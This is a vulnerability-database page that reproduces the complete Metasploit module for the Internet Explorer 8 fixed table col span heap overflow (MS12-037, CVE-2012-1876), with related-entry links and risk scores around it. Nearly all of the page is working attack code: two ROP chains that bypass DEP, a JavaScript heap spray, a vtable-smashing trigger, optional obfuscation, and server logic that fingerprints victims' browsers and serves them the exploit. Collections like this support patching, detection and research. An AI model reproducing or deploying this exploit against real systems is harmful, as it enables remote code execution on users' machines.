Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Microsoft Internet Explorer - Fixed Table Col Span Heap Overflow (MS12-037) (Metasploit)

🗓️ 02 Aug 2012 00:00:00Reported by MetasploitType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 49 Views

Microsoft Internet Explorer heap overflow due to fixed table col span attribute manipulation. Exploits vulnerability in IE 8.0

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Microsoft Internet Explorer Fixed Table Col Span Heap Overflow
2 Aug 201200:00
zdt
0day.today		Internet Explorer 8 Fixed Col Span ID full ASLR & DEP bypass
10 Jan 201300:00
zdt
0day.today		Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 4.1.X Bypass
1 Jul 201400:00
zdt
0day.today		Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.1 Bypass (MS12-037)
18 Nov 201400:00
zdt
Circl		CVE-2012-1876
2 Aug 201200:00
circl
Check Point Advisories		Internet Explorer Col Element Remote Code Execution (MS12-037; CVE-2012-1876)
12 Jun 201200:00
checkpoint_advisories
CVE		CVE-2012-1876
12 Jun 201222:00
cve
Cvelist		CVE-2012-1876
12 Jun 201222:00
cvelist
Exploit DB		Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP Bypass) (MS12-037)
10 Jan 201300:00
exploitdb
Exploit DB		Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP + EMET 4.1.x Bypass) (MS12-037)
1 Jul 201400:00
exploitdb
Rows per page
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::Remote::BrowserAutopwn
	autopwn_info({
		:os_name    => OperatingSystems::WINDOWS,
		:ua_minver  => "8.0",
		:ua_maxver  => "8.0",
		:rank       => NormalRanking, # reliable memory corruption
		:javascript => true
	})

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft Internet Explorer Fixed Table Col Span Heap Overflow',
			'Description'    => %q{
					This module exploits a heap overflow vulnerability in Internet Explorer caused
				by an incorrect handling of the span attribute for col elements from a fixed table,
				when they are modified dynamically by javascript code.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Alexandre Pelletier',                     # Vulnerability analysis
					'mr_me <steventhomasseeley[at]gmail.com>', # Metasploit module
					'binjo',                                   # Metasploit module
					'sinn3r',                                  # Help with the Metasploit module
					'juan'                                     # Help with the Metasploit module
				],
			'References'     =>
				[
					[ 'CVE', '2012-1876' ],
					[ 'OSVDB', '82866'],
					[ 'BID', '53848' ],
					[ 'MSB', 'MS12-037' ],
					[ 'URL', 'http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php' ]
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
					'InitialAutoRunScript' => 'migrate -f'
				},
			'Payload'        =>
				{
					'Space'         => 1024,
					'BadChars'      => "\x00",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Automatic', {} ],
					[ 'IE 8 on Windows XP SP3 with msvcrt ROP',
						{
							'Rop' => :msvcrt
						}
					],
					[ 'IE 8 on Windows 7 SP1',
						{
							'Rop' => :jre
						}
					]
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Jun 12 2012',
			'DefaultTarget'  => 0))

			register_options(
				[
					OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
				], self.class)
	end

	def get_target(agent)
		#If the user is already specified by the user, we'll just use that
		return target if target.name != 'Automatic'

		if agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
			return targets[1]  #IE 8 on Windows XP SP3
		elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8/
			return targets[2]  #IE 8 on Windows 7 with JRE
		else
			return nil
		end
	end

	def junk(n=4)
		return rand_text_alpha(n).unpack("V").first
	end

	def nop
		return make_nops(4).unpack("V").first
	end

	def get_payload(t)

		code = payload.encoded

		# Both ROP chains generated by mona.py - See corelan.be
		case t['Rop']
			when :msvcrt
				print_status("Using msvcrt ROP")
				exec_size = code.length
				rop =
					[
						0x77c4ec01, # retn
						0x77c4ec00, # pop ebp; retn
						0x77c15ed5, # xchg eax,esp; retn (pivot)
						0x77c4e392, # pop eax; retn
						0x77c11120, # <- *&VirtualProtect()
						0x77c2e493, # mov eax, dword ptr ds:[eax]; pop ebp; retn
						junk,
						0x77c2dd6c,
						0x77c4ec00, # pop ebp; retn
						0x77c35459, # ptr to 'push esp; ret'
						0x77c47705, # pop ebx; retn
						exec_size,  # ebx
						0x77c3ea01, # pop ecx; retn
						0x77c5d000, # W pointer (lpOldProtect) (-> ecx)
						0x77c46100, # pop edi; retn
						0x77c46101, # rop nop (-> edi)
						0x77c4d680, # pop edx; retn
						0x00000040, # newProtect (0x40) (-> edx)
						0x77c4e392, # pop eax; retn
						nop,        # nops (-> eax)
						0x77c12df9  # pushad; retn
					].pack("V*")
			when :jre
				print_status("Using JRE ROP")
				exec_size = code.length
				rop =
					[
						0x7c346c0b, # retn
						0x7c36f970, # pop ebp; retn
						0x7c348b05, # xchg eax,esp; retn (pivot)
						0x7c36f970, # pop ebp; retn [MSVCR71.dll]
						0x7c36f970, # skip 4 bytes [MSVCR71.dll]
						0x7c34373a, # pop ebx ; retn [MSVCR71.dll]
						exec_size,  # ebx
						0x7c3444d0, # pop edx ; retn [MSVCR71.dll]
						0x00000040, # 0x00000040-> edx
						0x7c361829, # pop ecx ; retn [MSVCR71.dll]
						0x7c38f036, # &Writable location [MSVCR71.dll]
						0x7c342766, # pop edi ; retn [MSVCR71.dll]
						0x7c346c0b, # retn (rop nop) [MSVCR71.dll]
						0x7c350564, # pop esi ; retn [MSVCR71.dll]
						0x7c3415a2, # jmp [eax] [MSVCR71.dll]
						0x7c3766ff, # pop eax ; retn [MSVCR71.dll]
						0x7c37a151, # ptr to &VirtualProtect() - 0x0ef [IAT msvcr71.dll]
						0x7c378c81, # pushad # add al,0ef ; retn [MSVCR71.dll]
						0x7c345c30  # ptr to 'push esp; ret ' [MSVCR71.dll]
					].pack("V*")
		end

		code = rop + code
		return code
	end

	def on_request_uri(cli, request)

		agent = request.headers['User-Agent']
		my_target = get_target(agent)

		# Avoid the attack if the victim doesn't have the same setup we're targeting
		if my_target.nil?
			print_error("Browser not supported: #{agent}")
			send_not_found(cli)
			return
		end

		js_code =  Rex::Text.to_unescape(get_payload(my_target), Rex::Arch.endian(target.arch))

		table_builder = ''

		0.upto(132) do |i|
			table_builder << "<table style=\"table-layout:fixed\" ><col id=\"#{i}\" width=\"41\" span=\"9\" >&nbsp </col></table>"
		end

		# About smash_vtable():
		# * smash the vftable 0x07070024
		# * span => the amount to overwrite
		js_element_id = Rex::Text.rand_text_alpha(4)
		spray_trigger_js = <<-JS

		var dap = "EEEE";
		while ( dap.length < 480 ) dap += dap;

		var padding = "AAAA";
		while ( padding.length < 480 ) padding += padding;

		var filler = "BBBB";
		while ( filler.length < 480 ) filler += filler;

		var arr = new Array();
		var rra = new Array();

		var div_container = document.getElementById("#{js_element_id}");
		div_container.style.cssText = "display:none";

		for (var i=0; i < 500; i+=2) {
			rra[i] = dap.substring(0, (0x100-6)/2);
			arr[i] = padding.substring(0, (0x100-6)/2);
			arr[i+1] = filler.substring(0, (0x100-6)/2);
			var obj = document.createElement("button");
			div_container.appendChild(obj);
		}

		for (var i=200; i<500; i+=2 ) {
			rra[i] = null;
			CollectGarbage();
		}

		function heap_spray(){
			CollectGarbage();

			var shellcode = unescape("#{js_code}");

			while (shellcode.length < 100000)
			shellcode = shellcode + shellcode;
			var onemeg = shellcode.substr(0, 64*1024/2);
			for (i=0; i<14; i++) {
				onemeg += shellcode.substr(0, 64*1024/2);
			}

			onemeg += shellcode.substr(0, (64*1024/2)-(38/2));
			var spray = new Array();

			for (i=0; i<400; i++) {
				spray[i] = onemeg.substr(0, onemeg.length);
			}
		}

		function smash_vtable(){
			var obj_col_0 = document.getElementById("132");
			obj_col_0.width = "1178993";
			obj_col_0.span = "44";
		}

		setTimeout(function(){heap_spray()}, 400);
		setTimeout(function(){smash_vtable()}, 700);
		JS

		if datastore['OBFUSCATE']
			spray_trigger_js = ::Rex::Exploitation::JSObfu.new(spray_trigger_js)
			spray_trigger_js.obfuscate
		end

		# build html
		content = <<-HTML
		<html>
		<body>
		<div id="#{js_element_id}"></div>
		#{table_builder}
		<script language='javascript'>
		#{spray_trigger_js}
		</script>
		</body>
		</html>
		HTML

		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response_html(cli, content)
	end

end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Aug 2012 00:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 29.3
EPSS0.87284
internet explorerheap overflowfixed table.
49